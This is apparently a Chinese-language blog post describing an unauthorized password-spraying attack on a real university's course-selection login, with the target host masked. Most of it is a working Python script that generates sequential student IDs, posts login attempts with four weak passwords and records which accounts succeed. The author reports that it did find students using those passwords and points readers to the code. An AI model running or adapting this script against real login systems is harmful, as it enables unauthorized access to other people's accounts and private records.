python3暴力破解某高校學生教務處帳號密碼

這倆天忽然想到，若是用python寫一個登錄腳本，用一堆帳號而後設定幾個弱密碼進行登錄，能不能獲取到‘一些信息’。

1.找到某高校官網,發現有一個選課系統登錄頁面

2.因而用chrome找到登錄請求

3.設定弱密碼

pd=['123456','1234567','12345678','123456789']

4.開始瘋狂爆破

#!/usr/bin/python3
#coding:utf8
import sys
import time
from bs4 import BeautifulSoup
import requests
def bp(id,pd):
    w=open('password','r+')
    w.read()
    w.write('密碼是'+pd+':\n')
    url='http://*****.cn:8080/jwcmis/zyxk/index.jsp'
    headers={
    'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
    'Host':'*****.cn:8080',
    'Origin':'http://******.cn:8080'
}
    for i in range(12):
        if i < 10:
            studentid = id+'0'
        else:
            studentid=id
        studentid+=str(i)
        sdd=studentid
        for n in range(30):
            studentid=sdd
            if n > 9:
                studentid+=str(n)
            else:
                studentid+='0'+str(n)
            postdata={
'studentid':studentid,
'password':pd,
'Submit':'(unable to decode value)'
}
            req=requests.Session()
            html=req.post(url=url,data=postdata,headers=headers)
            html=html.content.decode("gb2312")
            soup=BeautifulSoup(html,'html.parser')
            s=soup.find('div').find('p')
            su=str(s)
            if len(su) is 49:
                print(su,studentid)
                w.write(str(studentid)+'\n')
            time.sleep(0.5)
    w.close()
if __name__=='__main__':
    pd=['123456','1234567','12345678','123456789']
    for p in pd:
        print(p)
        bp('2014211001',pd=p)

5.跑了幾分鐘，果真有些學生用了上面的弱密碼,有些東西就塗掉了，，重點看上面代碼，‘——’